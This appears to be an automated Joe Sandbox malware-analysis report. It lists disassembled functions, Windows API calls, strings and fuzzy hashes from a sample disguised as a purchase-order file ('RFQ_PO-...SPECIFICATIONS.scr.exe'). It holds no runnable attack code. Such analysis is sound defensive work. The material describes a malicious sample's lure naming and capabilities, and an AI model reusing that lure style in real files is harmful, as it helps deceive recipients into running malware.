Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$CtrlParent$_wcslen
String ID: ComboBox$ListBox
API String ID: 2040099840-1403004172
Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779

Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53

SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E

Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$BrushCreateDeleteObjectSolid
String ID:
API String ID: 3771399671-0
Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769

Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0046ED01

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcscpy.LIBCMT ref: 0046ED22
VariantInit.OLEAUT32(?), ref: 0046ED88
VariantInit.OLEAUT32(?), ref: 0046ED8E
VariantInit.OLEAUT32(?), ref: 0046ED94
VariantInit.OLEAUT32(?), ref: 0046ED9A
VariantInit.OLEAUT32(?), ref: 0046EDA3
VariantInit.OLEAUT32(?), ref: 0046EDA9
VariantInit.OLEAUT32(?), ref: 0046EDB2
VariantInit.OLEAUT32(?), ref: 0046EDBB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: InitVariant$_malloc_wcscpy_wcslen
String ID:
API String ID: 3413494760-0
Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5

Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004377D7
GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69

Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0045F81A
__wcsicoll.LIBCMT ref: 0045F836
__wcsicoll.LIBCMT ref: 0045F852
__wcsicoll.LIBCMT ref: 0045F943

Strings

OFF, xrefs: 0045F868
DOWN, xrefs: 0045F830
0%d, xrefs: 0045F8DB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __wcsicoll
String ID: 0%d$DOWN$OFF
API String ID: 3832890014-468733193
Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B

Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0045E959
VariantCopy.OLEAUT32(00000000), ref: 0045E963
VariantClear.OLEAUT32 ref: 0045E970
VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
__swprintf.LIBCMT ref: 0045EB1F
VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
VariantInit.OLEAUT32(00000000), ref: 0045EBE7

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0045EB19

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d
API String ID: 43541914-1568723262
Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6

Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
Sleep.KERNEL32(0000000A), ref: 0042FE6E
InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D

Strings

@COM_EVENTOBJ, xrefs: 0042FFA0, 00430263
0vH, xrefs: 0042FF47, 00430052
4RH0vH, xrefs: 004301D8
0vH, xrefs: 0042FF75

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DecrementInterlocked$Sleep
String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
API String ID: 2250217261-3412429629
Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A

Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON

Download Yara Rule

Strings

NAME, xrefs: 00468BB6
TEXT, xrefs: 00468CFD
CLASSNN, xrefs: 00468AF4
REGEXPCLASS, xrefs: 00468B23
CLASS, xrefs: 00468AC5
INSTANCE, xrefs: 00468CC8

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 0-1603158881
Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A

Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479D1F
VariantInit.OLEAUT32(?), ref: 00479F06
VariantClear.OLEAUT32(?), ref: 00479F11
VariantInit.OLEAUT32(?), ref: 00479DF7

Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D

VariantClear.OLEAUT32(?), ref: 00479F9C

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Strings

Null Object assignment in FOR..IN loop, xrefs: 00479D67, 00479FB3
Incorrect Object type in FOR..IN loop, xrefs: 00479EF4
F, xrefs: 00479D1A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Variant$Copy$ClearInit$ErrorLast_memset
String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 665237470-60002521
Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766

Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D

Strings

HH, xrefs: 0046A7A4

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97

Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045F317
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
IsMenu.USER32(?), ref: 0045F380
CreatePopupMenu.USER32 ref: 0045F3C5
GetMenuItemCount.USER32(?), ref: 0045F42F
InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B

Strings

0, xrefs: 0045F30F
2, xrefs: 0045F39E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID: 0$2
API String ID: 3311875123-3793063076
Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67

Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe), ref: 0043719E
LoadStringW.USER32(00000000), ref: 004371A7
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
LoadStringW.USER32(00000000), ref: 004371C0
_printf.LIBCMT ref: 004371EC
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208

Strings

%s (%d) : ==> %s: %s %s, xrefs: 004371E7
C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe, xrefs: 00437189

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: HandleLoadModuleString$Message_printf
String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
API String ID: 220974073-1788260772
Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA

Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29

Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,?,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,004A8E80,C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe,0040F3D2), ref: 0040FFCA

Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9

lstrcmpiW.KERNEL32(?,?), ref: 0045355E
MoveFileW.KERNEL32(?,?), ref: 0045358E

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: File$AttributesFullMoveNamePathlstrcmpi
String ID:
API String ID: 978794511-0
Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767

Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339

Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
Sleep.KERNEL32(00000000), ref: 00445D70
MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
